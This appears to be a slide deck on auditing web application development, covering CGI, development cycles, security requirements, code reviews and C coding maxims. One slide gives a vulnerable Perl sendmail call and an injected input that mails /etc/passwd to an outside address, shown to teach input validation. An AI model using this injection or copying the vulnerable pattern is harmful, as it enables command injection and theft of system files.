Auditing the Development of Web-Based Applications

sweetlipscasteΑσφάλεια

2 Νοε 2013 (πριν από 3 χρόνια και 10 μήνες)

165 εμφανίσεις

Auditing the Development of
Web
-
Based Applications

Jian Zhen

Overview


Overview of WWW and HTTP


Web
-
based Application Concepts


Overview of the Development Cycles


Security Requirements


Web
-
based Application Security


Application Code Reviews

World
-
Wide
-
Web (WWW)


Invented by Tim Berners
-
Lee and others at
the European Laboratory for Particle
Physics (CERN)


Based on hypertext
--
a system of
embedding links in text to link to other text


The most popular way of linking to
resources on the Internet

WWW (Cont.)


Hundres of millions of pages indexed by
search engines


Tens of terabytes archived by Alexa


Hundreds of millions users on the Web

WWW and HTTP


Static Web Model

Common Gateway Interface (CGI)


Common


An open specification


Many languages


Gateway


Strength is not in what is does by itself


Methods to access other systems


Interface


Well defined way to call features

CGI (cont.)


A way of providing dynamic web content


Forms


Counters


Guest Books


Database Queries


Used by most of the web
-
based
applications

The CGI Model

Web Applications

Browsers:



Plug
-
ins



Applets



DHTML



etc

Internet

Server:



CGI



Servlets



ASP



NSAPI


CORBA/ODBC

Static

Pages

Database

Web Applications


Client side


HTML/DHTML


JavaScript, VBScript, PerlScript


Java


ActiveX


Plug
-
ins


Web Applications


Server side


Frontend: CGIs (Perl, C/C++), Java Servlets,
ISAPI, NSAPI, ASP, etc


Middleware: CORBA, ODBC, DCOM, etc


Backend: Oracle, Informix, Sybase, DB2, etc

Web Applications


Complex distributed, Client/Server
applications


Many elements involved and integrated


Rapid development


Requires more planning, design, and
control than “conventional” projects.


Web Development Cycles

Analysis

Design

Testing

Implementation

Prototyping

Web Development Cycles


Analysis


Feasibility study


Identify requirements


Involvment: your requirements


Web Development Cycles


Design


Design specifications


Involvment: system interoperability, resiliency,
capacity planning, mature technologies,
security design


Design Specification


Business
Requirement


Existing and Proposed
System Overview


Hardware and
Software
Requirements


System Schematic



System
Interoperability


Operational
cycle/Workflow
System Modules


Input
-
Output


User Interface
Prototypes


Web Development Cycles


Prototyping


Most time
-
consuming stage


Coding


Build, review, and refine prototype


Involvement: coding standards, effective
application development environment

Web Development Cycles


Testing


Unit/System test plans


Module/Unit testing


System integration testing


Involvement: test plans, effective testing
environment, testing stages, code reviews


Web Development Cycles


Delivery/Implementation


Install systems


Train users


Acceptance testing


Involvement: effective implementation

Security Requirements


Privacy
-

All user information are protected


Authentication/Access Control
-

Only
authorized users are allowed to access the
resources


Integrity
-

User and application data cannot
be tempered with


Auditing
-

Keeping audit logs and audit
trails and ensuring their integrity

Privacy


Protecting users’ private information


SSN


Birthdates


Employee Ids


Passwords


Technologies


Encryption: DES, RSA, SSL


Local vs. Network

Authentication


Proof of Identity


Required to enforce access control and
accountability, and achieve non
-
repudiation


Technologies


username/password


Smart Cards, SecurID


Biometrics

Access Control


Determine who is authorized to receive or
modify information


Common mechanisms


Mandatory Access Control (MAC)


Owners cannot modify access list (SeOS)


Discretionary Access Control (DAC)


Owners are allowed to modify access (UNIX)


Role
-
based Access Control (RBAC)


Role granted provides necessary access

Auditing


The process of collecting and recording
security
-
relevant activities on a system


After
-
the
-
fact technique


Audit logs are used as evidence


Data Encryption


Confidentiality


Scrambling data to unreadable format


Integrity


User and application data are not modified


Technologies


Public/Secret Key Encryption: RSA, DES


Digital Signatures: DSS


Hashes: MD5


Web
-
based Application Security


Security flaws occur when software bugs
allow violation of security policy


Different security flaw present different
threats


Opening backdoors


Stealing information or system resource


Destroying or tempering data

Where Do Flaws Exist?


Operating Systems


UNIX, NT


Support Software and Libraries


Compilers, C Libraries


Applications


CGI programs, Netscape, Internet Explorer, vi,
Emacs, Sendmail, many others

Web
-
based Application Security


Different layers of security


Network security


Operating System security


Web server security


Application security


MUST PROTECT ALL LAYERS!!!


Rootshell gets defaced!

Web
-
based Application Security


Common Security Flaws


Insufficient Input Validations


Memory Cleansing, i.e. Cookie deletion on the
client


Environmental Faults


Buffer Overflows


Race Conditions

Web
-
based Application Security


CGI Programming Example


What if we used this Perl code to send mail
to an address given in a fill
-
out form?


$mail_to= &get_name_from_input; #read the address

open (MAIL, “| /usr/lib/sendmail $mail_to”);

print MAIL “To: $mail_to
\
nFrom: me
\
n
\
nHello
\
n”;

close MAIL;

CGI Example (cont.)


Look at the open() call

open (MAIL, “| /usr/lib/sendmail $mail_to”);


What if the user entered

jerk@nowhere.com;mail
evilone@chaos.org</etc/passwd;


Look at the open again!

/usr/lib/sendmail jerk@nowhere.com; mail
evilone@chaos.org</etc/passwd;

Web
-
based Application Security


Never Assume That:


The input to a field from a selection list will be
one of the items on the list


A browser will never send more than the
maximum length of an input field


The field in the QUERY_STRING variable will
match the ones on the page


The QUERY_STRING variable will correspond to
something that is within valid HTTP specs

Web
-
based Application Security


AVOID shell programming!


Always use full pathnames for both
commands and filenames, or explicitly set
the PATH variable


Don’t depend on the current directory


Use and check all return codes from
system calls


Web
-
based Application Security


Have internal consistency checking code


Include lots of logging


Review publicly available programs


Review error logs


Make the critical portion of the program as
simple as possible


Read through the code

Code Reviews


Code Inspection


Formal


Walk Through


Code Reading


Informal

Code Reviews


Code Inspection


Formal code review


Emphasize on defect detection, not correction


Reviewers prepare beforehand


Distinct roles are assigned

Code Reviews


Walkthroughs


Usually hosted and moderated by the author of
the design or code under review


To improve the technical quality of a program


Emphasize on error detection

Code Reviews


Code Reading


Read source code and look for errors


Comment on design, style, readability,
maintainability, and efficiency


Informal meetings


Probably most common in web
-
based
application environment

Appendix


The Ten Commandments for C
Programmers

The Ten Commandments for C
Programmers


Thou shalt run
lint

frequently and study its
pronouncements with care, for verily its perception
and judgement oft exceed thine.


Thou shalt not follow the NULL pointer, for chaos and
madness await thee at its end.

The Ten Commandments for C
Programmers (cont.)


Thou shalt cast all function arguments to the
expected type if they are not of that type already, een
when thou are convinced that this is unnecessary,
lest the take cruel vengeance upon thee when thou
least expect it.


If thy header files fail to declare the return types of
thy library functions, thou shalt declare them thyself
with the most meticulous care, lest grievous harm
befall thy program.

The Ten Commandments for C
Programmers (cont.)


Thou shalt check the array bounds of all strings
(indeed, all arrays,) for surely where thou typest “foo”
someone someday shall type
“supercalifragilisticexpialidocious.”


If a function be advertised to return an error code in
the event of difficulties, thou shalt check for that
code, yea, even though the checks triple the size of
thy code and produce aches in thy typing fingers, for
if thou thinkest “it cannot happen to me,” the gods
shall surely punish thee for thy arrogance.

The Ten Commandments for C
Programmers (cont.)


Thou shalt study thy libraries and strive not to re
-
invent them without cause, that thy code may be short
and readable and thy days pleasant and productive.


Thou shalt make thy program’s purpose and structure
clear to thy fellow man by using the One True Brace
Style, even if thou likest it not, for thy creativity is
better used in solving problems than in creating
beautiful new impediments to understanding.

The Ten Commandments for C
Programmers (cont.)


Thy external identifiers shall be unique in the first six
characters, though this harsh discipline be irksome and the
years of its necessity stretch before thee seemingly without
end, lest thou tear thy hair out and go mad on that fateful day
when thou desirest to make thy program run on an old
system.


Thou shalt foreswear, renounce, and abjure the vile heresy
which claimeth that “All the world’s a VAX,” and have no
commerce with the benighted heathens who cling to this
barbarous belif, that the days of thy program may be long
even though the days of thy current machine be short.